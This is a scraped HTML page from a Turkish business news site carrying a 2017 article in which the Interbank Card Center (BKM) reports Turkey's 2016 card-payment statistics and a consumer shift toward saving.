<a href="http://www.kobi-efor.com.tr/firma-tanitim/psikodrama-hayatimizi-kolaylastirir-h6040.html" title="Psikodrama Hayatımızı Kolaylaştırır"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/psikodrama_hayatimizi_kolaylastirir_h6040_7fb36.png" alt="Psikodrama Hayatımızı Kolaylaştırır" />
<b>Psikodrama Hayatımızı Kolaylaştırır</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/haber/avrupa-birliginin-kapisinda-bir-ulke-bosna-hersek-h6042.html" title="Avrupa Birliğinin kapısında bir ülke: Bosna-Hersek"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/avrupa_birliginin_kapisinda_bir_ulke_bosna_hersek_h6042_61605.png" alt="Avrupa Birliğinin kapısında bir ülke: Bosna-Hersek" />
<b>Avrupa Birliği’nin kapısında bir ülke: Bosna-Hersek</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/haber/marmara-grubu-vakfi-kibris-taydi-h6044.html" title="Marmara Grubu Vakfı Kıbrıs#039;taydı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/marmara_grubu_vakfi_kibris_taydi_h6044_2fadb.png" alt="Marmara Grubu Vakfı Kıbrıs#039;taydı" />
<b>Marmara Grubu Vakfı Kıbrıs&#039;taydı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/haber/mucevherde-bu-yilin-favorisi-zumrut-h6049.html" title="Mücevherde bu yılın favorisi; zümrüt"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/mucevherde_bu_yilin_favorisi_zumrut_h6049_a1393.png" alt="Mücevherde bu yılın favorisi; zümrüt" />
<b>Mücevherde bu yılın favorisi; zümrüt</b></a>
</div>
</div></div> 
          </div>
                      </div>
        </div>
<!-- MENU ***************************************************** -->
              <!-- UST MANSET -->
        <div id="ustmanset" class="span12">
          <div class="row-fluid">
          <ul class="thumbnails">
				
			<li class="span3"><a href="http://www.kobi-efor.com.tr/kapak/2017de-ekonomik-yukselise-yeni-bir-kaldirac-gumruk-birligi-reformu-h6006.html" title="2017’de ekonomik yükselişe yeni bir ‘kaldıraç’; GÜMRÜK BİRLİĞİ REFORMU" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/gumruk-birligi-reformu-um.jpg" alt="2017’de ekonomik yükselişe yeni bir ‘kaldıraç’; GÜMRÜK BİRLİĞİ REFORMU"  />
			<div class="caption-line"><p>Gümrük Birliği Reformu</p></div>						</a>
			</li>


		
			<li class="span3"><a href="http://www.kobi-efor.com.tr/haber/dogu-kalkinmasi-icin-start-verildi-cazibe-merkezleri-h6007.html" title="Doğu kalkınması için start verildi; Cazibe Merkezleri" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/cazibe-merkezi-programi-um.jpg" alt="Doğu kalkınması için start verildi; Cazibe Merkezleri"  />
			<div class="caption-line"><p>Cazibe Merkezi Programı</p></div>						</a>
			</li>


		
			<li class="span3"><a href="http://www.kobi-efor.com.tr/ayin-konugu/mugla-valisi-amir-cicekin-kent-ozetlemesiturizm-ve-yatirim-cenneti-h6008.html" title="Muğla Valisi Amir Çiçek’in kent özetlemesi:Turizm ve yatırım cenneti" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/mugla-valisi-amir-cicek-um.jpg" alt="Muğla Valisi Amir Çiçek’in kent özetlemesi:Turizm ve yatırım cenneti"  />
			<div class="caption-line"><p>Muğla Valisi Amir Çiçek</p></div>						</a>
			</li>


		
			<li class="span3"><a href="http://www.kobi-efor.com.tr/haber/bursada-kobilere-ve-girisimcilere-finansal-cozumler-h6009.html" title="Bursa’da KOBİ’lere ve girişimcilere finansal çözümler" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/bursa-tosyov-um.jpg" alt="Bursa’da KOBİ’lere ve girişimcilere finansal çözümler"  />
			<div class="caption-line"><p>Bursa'da KOBİ'lere Finansal Çözümler</p></div>						</a>
			</li>


		
			<li class="span3"><a href="http://www.kobi-efor.com.tr/osb-tanitim/ikitelli-organize-sanayi-bolgesi-yonetim-kurulu-baskan-vekili-saban-gulbahar-h6010.html" title="İkitelli Organize Sanayi Bölgesi Yönetim Kurulu Başkan Vekili Şaban Gülbahar" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/ikitelli-osb-saban-gulbahar-um.jpg" alt="İkitelli Organize Sanayi Bölgesi Yönetim Kurulu Başkan Vekili Şaban Gülbahar"  />
			<div class="caption-line"><p>İkitelli Organize Sanayi Bölgesi</p></div>						</a>
			</li>


		
           
          </ul>
          </div>
        </div>
        <!-- USTMANSET ***************************************************** -->
                      </div>
        </div>
        <div class="row">
                       <div class="page-header-fixed style span12 hide">
                <div class="title">REEL SEKTÖR: <strong class="title"></strong>
                </div>
                <div class="pull-right">                  <span class="scroll-link" id="yorumyaplink"><i class="halflings-icon white comments"></i> Yorum Yap</span>                  <a class="print" href="javascript:window.print()"><i class="halflings-icon white print"></i> Yazdır</a>
                  <a href="javascript:void(0);" onclick="shareFacebook(fbThumb, fbUrl, fbTitle, fbDesc);" class="" rel="nofollow"><i class="halflings-icon white share-alt"></i> <b>Facebook</b>'ta Paylaş</a>
                </div>
            </div>
           
          
          

          <div>
            
            <div id="main" class="span8">
              <div class="row-fulid">
                                                  <div id="breadcrumb">
    <ul class="breadcrumb">
    <li>Buradasınız: </li>
    <li><a href="http://www.kobi-efor.com.tr/">Ana Sayfa</a> <span class="divider">/</span></li>
    <li class="active"><a href="http://www.kobi-efor.com.tr/reel-sektor">REEL SEKTÖR</a></li>
  </ul>
</div>
  <article id="haber">
   
  <div class="page-header">
    <div class="row-fluid muted">
      <p class="pull-left">01 Şubat 2017 Çarşamba 08:00<br>Bu haber <b>1753</b> kez okundu.</p>
      <p class="pull-right karakterislem secilemez">
        <i class="glyphicons-icon font-down"></i>
        <i class="glyphicons-icon font-up"></i>
        <i class="glyphicons-icon font-normal"></i>
        <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a>
      </p>
    </div>
        <h1 class="title">BKM açıkladı: “2016&#039;da tüketici tasarrufa yöneldi, lüks tüketimi azalttı”</h1><p class="lead">Bankalararası Kart Merkezi (BKM), Türkiye&#039;de kartlı ödemeler ve nakitsiz toplum hedefine yönelik çalışmalar konusunda 2016 yılında yaşanan gelişmeleri, yapılan basın toplantısında değerlendirdi.</p>

  </div>
    <div class="row-fluid newspic"><img src="http://www.kobi-efor.com.tr/images/haberler/bkm_acikladi_2016_da_tuketici_tasarrufa_yoneldi_luks_tuketimi_azaltti_h6095_559cb.png" alt="BKM açıkladı: &#039;2016&#039;da tüketici tasarrufa yöneldi, lüks tüketimi azalttı”" /></div>
   
      <div class="row-fluid page-social">
      <div class="span12">
        <div class="shr">
        <div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>



<div class="fb-like" data-href="http://www.kobi-efor.com.tr/reel-sektor/bkm-acikladi-2016-da-tuketici-tasarrufa-yoneldi-luks-tuketimi-azaltti-h6095.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div>
<div class="btn-social-wrapper">
                <a class="btn-social btn-facebook" href="https://www.facebook.com/sharer/sharer.php?u=http://www.kobi-efor.com.tr/reel-sektor/bkm-acikladi-2016-da-tuketici-tasarrufa-yoneldi-luks-tuketimi-azaltti-h6095.html"
                    onclick="window.open(this.href, 'facebook-share','width=605,height=370');return false;"><i class="social-icon white facebook"></i> Facebook'ta Paylaş
                </a>
                <a class="btn-social btn-twitter" href="http://twitter.com/share?text=BKM+a%C3%A7%C4%B1klad%C4%B1%3A+%E2%80%9C2016%27da+t%C3%BCketici+tasarrufa+y%C3%B6neldi%2C+l%C3%BCks+t%C3%BCketimi+azaltt%C4%B1%E2%80%9D&url=http://www.kobi-efor.com.tr/reel-sektor/bkm-acikladi-2016-da-tuketici-tasarrufa-yoneldi-luks-tuketimi-azaltti-h6095.html"
                    onclick="window.open(this.href, 'twitter-share', 'width=570,height=290');return false;"><i class="social-icon white twitter"></i> Tweetle
                </a>
                <a class="btn-social btn-google" href="https://plus.google.com/share?url=http://www.kobi-efor.com.tr/reel-sektor/bkm-acikladi-2016-da-tuketici-tasarrufa-yoneldi-luks-tuketimi-azaltti-h6095.html"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white google_plus"></i> Google+ Paylaş
                </a>
                <a class="btn-social btn-linkedin" href="http://www.linkedin.com/shareArticle?mini=true&url=http://www.kobi-efor.com.tr/reel-sektor/bkm-acikladi-2016-da-tuketici-tasarrufa-yoneldi-luks-tuketimi-azaltti-h6095.html&title=BKM+a%C3%A7%C4%B1klad%C4%B1%3A+%E2%80%9C2016%27da+t%C3%BCketici+tasarrufa+y%C3%B6neldi%2C+l%C3%BCks+t%C3%BCketimi+azaltt%C4%B1%E2%80%9D"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white linked_in"></i> LinkedIn'de Paylaş
                </a>
</div>



        </div>
      </div>
    </div>
  <div id="newstext" class="row-fluid page-content">
                          <span style="font-size: 12px;"><span style="font-family: Verdana;"><a href="http://www.kobi-efor.com.tr/haberleri/" title="" target="_blank" class="klink"></a>BKM Genel Müdürü Dr. Soner Canko, 2016 yılında lüks tüketimin azaldığını ve tüketicilerin temel ihtiyaçlarını karşılayarak tasarrufa yöneldiğini belirtti. Canko, Türkiye'nin 2023 yılında nakitsiz toplum olma hedefinde temponun düşmediğini, nakitsiz yaşam, mobil ticaret ve finansal teknoloji girişimleri (Fintech'ler) başlıklarında Türkiye'nin sağlıklı büyümesini sürdürdüğünü vurguladı. Türkiye'de 2016 itibarıyla banka ve kredi kartları dahil olmak üzere toplamda 176 milyon kart olduğunun altını çizen Canko, bu kartların 58.8 milyonunun kredi kartı, 117 milyonunun banka kartı olduğunu vurguladı. Kart sayısı gelişiminde 2015'ten 2016'ya yüzde 3'lük artış olduğuna dikkat çeken Canko, “Avrupa'nın 1 numaralı kart pazarı olmayı sürdürüyoruz” diye konuştu. Ödemelerdeki kart kullanımının artışına dikkat çeken Canko, “2016'da toplam kartlı ödemeler yüzde 12 büyüdü. 2015'te 526 milyar TL tutarında kartlı alışveriş yapılmıştı. 2016'da bu miktar yüzde 12 oranında artışla 587 milyar TL'ye çıktı” ifadelerini kullandı.<br/></span></span><span style="font-family: Verdana;">Ticari kredi kartı ve banka kartları ile yapılan ödemelerdeki artış hızına da değinen Canko, “Ticari kredi kartı ve banka kartları ile yapılan ödemeler toplam kartlı ödemelere göre daha hızlı büyüyor. Ticari kredi kartı ödemeleri yüzde 17, banka kartı ödemeleri ise yüzde 34 büyüdü. Artık her 4 kartlı ödemeden 1'i banka kartları ile yapılıyor” dedi.</span>
                  </div>

        <div class="row-fluid">
        <div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>



<div class="fb-like" data-href="http://www.kobi-efor.com.tr/reel-sektor/bkm-acikladi-2016-da-tuketici-tasarrufa-yoneldi-luks-tuketimi-azaltti-h6095.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div>
<div class="btn-social-wrapper">
                <a class="btn-social btn-facebook" href="https://www.facebook.com/sharer/sharer.php?u=http://www.kobi-efor.com.tr/reel-sektor/bkm-acikladi-2016-da-tuketici-tasarrufa-yoneldi-luks-tuketimi-azaltti-h6095.html"
                    onclick="window.open(this.href, 'facebook-share','width=605,height=370');return false;"><i class="social-icon white facebook"></i> Facebook'ta Paylaş
                </a>
                <a class="btn-social btn-twitter" href="http://twitter.com/share?text=BKM+a%C3%A7%C4%B1klad%C4%B1%3A+%E2%80%9C2016%27da+t%C3%BCketici+tasarrufa+y%C3%B6neldi%2C+l%C3%BCks+t%C3%BCketimi+azaltt%C4%B1%E2%80%9D&url=http://www.kobi-efor.com.tr/reel-sektor/bkm-acikladi-2016-da-tuketici-tasarrufa-yoneldi-luks-tuketimi-azaltti-h6095.html"
                    onclick="window.open(this.href, 'twitter-share', 'width=570,height=290');return false;"><i class="social-icon white twitter"></i> Tweetle
                </a>
                <a class="btn-social btn-google" href="https://plus.google.com/share?url=http://www.kobi-efor.com.tr/reel-sektor/bkm-acikladi-2016-da-tuketici-tasarrufa-yoneldi-luks-tuketimi-azaltti-h6095.html"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white google_plus"></i> Google+ Paylaş
                </a>
                <a class="btn-social btn-linkedin" href="http://www.linkedin.com/shareArticle?mini=true&url=http://www.kobi-efor.com.tr/reel-sektor/bkm-acikladi-2016-da-tuketici-tasarrufa-yoneldi-luks-tuketimi-azaltti-h6095.html&title=BKM+a%C3%A7%C4%B1klad%C4%B1%3A+%E2%80%9C2016%27da+t%C3%BCketici+tasarrufa+y%C3%B6neldi%2C+l%C3%BCks+t%C3%BCketimi+azaltt%C4%B1%E2%80%9D"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white linked_in"></i> LinkedIn'de Paylaş
                </a>
</div>



        </div>
</article>

      <div class="row-fluid galleries">
    <div class="title">
      <span>İlgili Galeriler</span><hr>
    </div>
    <div class="content">
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/carklar-daha-hizli-donecek-resimleri,44.html" title="Çarklar Daha Hızlı Dönecek">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/2013-ayarli-buyume_1.jpg" alt="Çarklar Daha Hızlı Dönecek" />
          <b>Çarklar Daha Hızlı...</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/turizm-resimleri,43.html" title="Turizm">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/turizm_2.jpg" alt="Turizm" />
          <b>Turizm</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/telekomunikasyon-resimleri,42.html" title="Telekomünikasyon">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/telekomunikasyon_1.jpg" alt="Telekomünikasyon" />
          <b>Telekomünikasyon</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/madencilik-resimleri,41.html" title="Madencilik">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/madencilik_1.jpg" alt="Madencilik" />
          <b>Madencilik</b>
        </a>
      </div>
          </div>
  </div>
    <div id="yorumyap" style="margin:0"></div>
  <div class="row-fluid keywords"><div class="title"><span>Anahtar Kelimeler</span><hr></div><a href="http://www.kobi-efor.com.tr/haberleri/Dr.+Soner+Canko" title="Dr. Soner Canko haberleri">Dr. Soner Canko</a><a href="http://www.kobi-efor.com.tr/haberleri/Soner+Canko" title="Soner Canko haberleri">Soner Canko</a><a href="http://www.kobi-efor.com.tr/haberleri/Bankalararas%C4%B1+Kart+Merkezi" title="Bankalararası Kart Merkezi haberleri">Bankalararası Kart Merkezi</a><a href="http://www.kobi-efor.com.tr/haberleri/BKM" title="BKM haberleri">BKM</a></div>
    <section>
            <div id="yorumlar">
            <ul class="nav nav-tabs" id="ytab">
              <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li>
               <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.kobi-efor.com.tr/reel-sektor/bkm-acikladi-2016-da-tuketici-tasarrufa-yoneldi-luks-tuketimi-azaltti-h6095.html">0</fb:comments-count></span></a></li>            </ul>

            <div class="tab-content">
                                          <div class="tab-pane active" id="yorumpanel">
                  <div class="yorumlar panel">
                    <div class="alert alert-block alert-error" style="display:block;">
                      <button type="button" class="close" data-dismiss="alert">×</button>
                      <h4 class="alert-heading">Dikkat!</h4>
                      <p>Yorum yapabilmek için üye girşi yapmanız gerekmektedir. Üye değilseniz hemen üye olun.</p>
                      <p>
                        <a class="btn" href="/index.php?m=login">Üye Girişi Yap</a> <a class="btn" href="/uyelik.html">Yeni Üyelik</a>
                      </p>
                    </div>
                  </div>
                              
            
            
            </div> <!-- .tab-pane -->


                          <div class="tab-pane yorumlar fbpanel" id="facebookpanel">
                <div class="row-fluid">
                  <div id="fb-root"></div>
                  <script>(function(d, s, id) {
                    var js, fjs = d.getElementsByTagName(s)[0];
                    if (d.getElementById(id)) return;
                    js = d.createElement(s); js.id = id;
                    js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1";
                    fjs.parentNode.insertBefore(js, fjs);
                  }(document, 'script', 'facebook-jssdk'));</script>
                  <div class="fb-comments" data-href="http://www.kobi-efor.com.tr/reel-sektor/bkm-acikladi-2016-da-tuketici-tasarrufa-yoneldi-luks-tuketimi-azaltti-h6095.html" data-width="603" data-colorscheme="light" data-numposts="10"></div>
                </div> <!-- #facebookpanel -->
              </div>
            
          </div> <!-- .tab-content -->

        </div> <!-- #yorumlar -->

 
  </section>
    <div class="box haberler">
    <div class="box header">
      <h5><i class="glyphicons-icon globe"></i> <b>İlgili Haberler</b></h5>
    </div>
    <div class="box content">
      <div class="row-fluid first">
              <div class="span3">
          <a href="http://www.kobi-efor.com.tr/reel-sektor/arcelik-turkiye-genel-muduru-can-dincer-oldu-h6103.html" title="Arçelik Türkiye Genel Müdürü Can Dinçer oldu">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/arcelik_turkiye_genel_muduru_can_dincer_oldu_h6103_608e6.png" alt="Arçelik Türkiye Genel Müdürü Can Dinçer oldu" />
            <b>Arçelik Türkiye Genel Müdürü Can Dinçer oldu</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/reel-sektor/gedikten-savunma-teknolojileri-alaninda-isbirligi-h6102.html" title="Gedik’ten savunma teknolojileri alanında işbirliği">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/gedikten_savunma_teknolojileri_alaninda_isbirligi_h6102_fffae.png" alt="Gedik’ten savunma teknolojileri alanında işbirliği" />
            <b>Gedik’ten savunma teknolojileri alanında işbirliği</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/reel-sektor/ziraat-bankasi-surdurulebilir-uretimin-finansmaninda-iddiali-h6101.html" title="Ziraat Bankası, sürdürülebilir üretimin finansmanında iddialı">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ziraat_bankasi_surdurulebilir_uretimin_finansmaninda_iddiali_h6101_153d8.png" alt="Ziraat Bankası, sürdürülebilir üretimin finansmanında iddialı" />
            <b>Ziraat Bankası, sürdürülebilir üretimin finansmanında...</b>
          </a>
        </div>  
                </div> 
        <div class="row-fluid">
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/reel-sektor/albaraka-turke-buyuk-onur-h6100.html" title="Albaraka Türk’e büyük onur">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/albaraka_turke_buyuk_onur_h6100_6bcb2.png" alt="Albaraka Türk’e büyük onur" />
            <b>Albaraka Türk’e büyük onur</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/reel-sektor/sabanci-holding-sanayi-grubu-yatirima-hazirlaniyor-h6099.html" title="Sabancı Holding Sanayi Grubu yatırıma hazırlanıyor">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/sabanci_holding_sanayi_grubu_yatirima_hazirlaniyor_h6099_3f6dd.png" alt="Sabancı Holding Sanayi Grubu yatırıma hazırlanıyor" />
            <b>Sabancı Holding Sanayi Grubu yatırıma hazırlanıyor</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/reel-sektor/ozgur-obali-otomatik-katilim-2017de-ekonomiye-pozitif-katki-saglayacak-h6098.html" title="Özgür Obalı: Otomatik katılım, 2017’de ekonomiye pozitif katkı sağlayacak">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ozgur_obali_otomatik_katilim_2017de_ekonomiye_pozitif_katki_saglayacak_h6098_0958e.png" alt="Özgür Obalı: Otomatik katılım, 2017’de ekonomiye pozitif katkı sağlayacak" />
            <b>Özgür Obalı: Otomatik katılım, 2017’de ekonomiye...</b>
          </a>
        </div>  
                    </div> 
    </div>
  </div>
   
                 
              </div>
            </div>
                        <div class="aside">
              <div id="sidebar" class="span4">
                <div class="row-fulid">
                                                                    <!-- ONE CIKANLAR  -->
            <div id="onecikanlar">
              <div class="header">
                <h5><i class="halflings-icon white star"></i>Reel Sektör Haberleri</h5>
                <a class="control left" href="#" id="onprev"></a>
                <a class="control right" href="#" id="onnext"></a>
              </div>
              <div class="content">
                  <div class="item">
                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/eskisehir-405-milyon-avro-butceden-pay-almak-istiyor-h6083.html" title="Eskişehir 405 milyon avro bütçeden pay almak istiyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/eskisehir_405_milyon_avro_butceden_pay_almak_istiyor_h6083_4eefb.png" alt="Eskişehir 405 milyon avro bütçeden pay almak istiyor" />
                    <p>Eskişehir 405 milyon avro bütçeden pay almak istiyor</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/arcelik-turkiye-genel-muduru-can-dincer-oldu-h6103.html" title="Arçelik Türkiye Genel Müdürü Can Dinçer oldu">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/arcelik_turkiye_genel_muduru_can_dincer_oldu_h6103_608e6.png" alt="Arçelik Türkiye Genel Müdürü Can Dinçer oldu" />
                    <p>Arçelik Türkiye Genel Müdürü Can Dinçer oldu</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/gedikten-savunma-teknolojileri-alaninda-isbirligi-h6102.html" title="Gedik&#039;ten savunma teknolojileri alanında işbirliği">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/gedikten_savunma_teknolojileri_alaninda_isbirligi_h6102_fffae.png" alt="Gedik’ten savunma teknolojileri alanında işbirliği" />
                    <p>Gedik’ten savunma teknolojileri alanında işbirliği</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/vodafonedan-kobi-seferberligi-h6082.html" title="Vodafone&#039;dan KOBİ seferberliği">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/vodafonedan_kobi_seferberligi_h6082_dd2ea.png" alt="Vodafone’dan KOBİ seferberliği" />
                    <p>Vodafone’dan KOBİ seferberliği</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/cagri-merkezi-sektorunde-buyuk-birlesme-h6086.html" title="Çağrı merkezi sektöründe büyük birleşme">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/cagri_merkezi_sektorunde_buyuk_birlesme_h6086_6b52c.png" alt="Çağrı merkezi sektöründe büyük birleşme" />
                    <p>Çağrı merkezi sektöründe büyük birleşme</p>
                  </a>
                  
                                  </div>
                <div class="item">                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/ozgur-obali-otomatik-katilim-2017de-ekonomiye-pozitif-katki-saglayacak-h6098.html" title="Özgür Obalı: Otomatik katılım, 2017&#039;de ekonomiye pozitif katkı sağlayacak">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ozgur_obali_otomatik_katilim_2017de_ekonomiye_pozitif_katki_saglayacak_h6098_0958e.png" alt="Özgür Obalı: Otomatik katılım, 2017’de ekonomiye pozitif katkı sağlayacak" />
                    <p>Özgür Obalı: Otomatik katılım, 2017’de ekonomiye pozitif katkı sağlayacak</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/mes-ureticileri-ve-hizmet-saglayicilar-biraraya-geldi-h6090.html" title="MES Üreticileri ve Hizmet Sağlayıcılar biraraya geldi">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/mes_ureticileri_ve_hizmet_saglayicilar_biraraya_geldi_h6090_843af.png" alt="MES Üreticileri ve Hizmet Sağlayıcılar biraraya geldi" />
                    <p>MES Üreticileri ve Hizmet Sağlayıcılar biraraya geldi</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/sabanci-holding-sanayi-grubu-yatirima-hazirlaniyor-h6099.html" title="Sabancı Holding Sanayi Grubu yatırıma hazırlanıyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/sabanci_holding_sanayi_grubu_yatirima_hazirlaniyor_h6099_3f6dd.png" alt="Sabancı Holding Sanayi Grubu yatırıma hazırlanıyor" />
                    <p>Sabancı Holding Sanayi Grubu yatırıma hazırlanıyor</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/okiden-e-64s-h6089.html" title="OKI&#039;den E-64s">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/okiden_e_64s_h6089_c4ab0.png" alt="OKI’den E-64s" />
                    <p>OKI’den E-64s</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/kyocera-blidan-tavsiye-edildi-h6093.html" title="Kyocera BLI&#039;dan tavsiye edildi">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kyocera_blidan_tavsiye_edildi_h6093_93e8d.png" alt="Kyocera BLI’dan tavsiye edildi" />
                    <p>Kyocera BLI’dan tavsiye edildi</p>
                  </a>
                  
                                  </div>
                <div class="item">                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/odtu-teknokent-oyun-gelistiricileri-bulusturdu-h6092.html" title="ODTÜ Teknokent, oyun geliştiricileri buluşturdu">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/odtu_teknokent_oyun_gelistiricileri_bulusturdu_h6092_7d380.png" alt="ODTÜ Teknokent, oyun geliştiricileri buluşturdu" />
                    <p>ODTÜ Teknokent, oyun geliştiricileri buluşturdu</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/ekolojik-borusanlinin-ev-halleri-h6085.html" title="Ekolojik Borusanlı&#039;nın Ev Halleri">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ekolojik_borusanlinin_ev_halleri_h6085_18350.png" alt="Ekolojik Borusanlı’nın Ev Halleri" />
                    <p>Ekolojik Borusanlı’nın Ev Halleri</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/anadolu-isuzuya-inovasyon-stratejisi-odulu-h6091.html" title="Anadolu Isuzu&#039;ya ‘İnovasyon Stratejisi&#039; ödülü">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/anadolu_isuzuya_inovasyon_stratejisi_odulu_h6091_1f988.png" alt="Anadolu Isuzu’ya ‘İnovasyon Stratejisi’ ödülü" />
                    <p>Anadolu Isuzu’ya ‘İnovasyon Stratejisi’ ödülü</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/albaraka-turke-buyuk-onur-h6100.html" title="Albaraka Türk&#039;e büyük onur">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/albaraka_turke_buyuk_onur_h6100_6bcb2.png" alt="Albaraka Türk’e büyük onur" />
                    <p>Albaraka Türk’e büyük onur</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/anadolu-grubu-icra-baskanligi-gorevine-hursit-zorlu-atandi-h6094.html" title="Anadolu Grubu İcra Başkanlığı görevine Hurşit Zorlu atandı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/anadolu_grubu_icra_baskanligi_gorevine_hursit_zorlu_atandi_h6094_bcdc0.png" alt="Anadolu Grubu İcra Başkanlığı görevine Hurşit Zorlu atandı" />
                    <p>Anadolu Grubu İcra Başkanlığı görevine Hurşit Zorlu atandı</p>
                  </a>
                  
                                  </div>
                <div class="item">                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/fibabanka-asde-omer-mert-donemi-h6088.html" title="Fibabanka A.Ş.&#039;de Ömer Mert dönemi">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/fibabanka_asde_omer_mert_donemi_h6088_94239.png" alt="Fibabanka A.Ş.’de Ömer Mert dönemi" />
                    <p>Fibabanka A.Ş.’de Ömer Mert dönemi</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/yerlilestirme-seferberligi-basliyor-h6084.html" title="Yerlileştirme seferberliği başlıyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yerlilestirme_seferberligi_basliyor_h6084_01d9a.png" alt="Yerlileştirme seferberliği başlıyor" />
                    <p>Yerlileştirme seferberliği başlıyor</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/bkm-acikladi-2016-da-tuketici-tasarrufa-yoneldi-luks-tuketimi-azaltti-h6095.html" title="BKM açıkladı: &#039;2016&#039;da tüketici tasarrufa yöneldi, lüks tüketimi azalttı”">
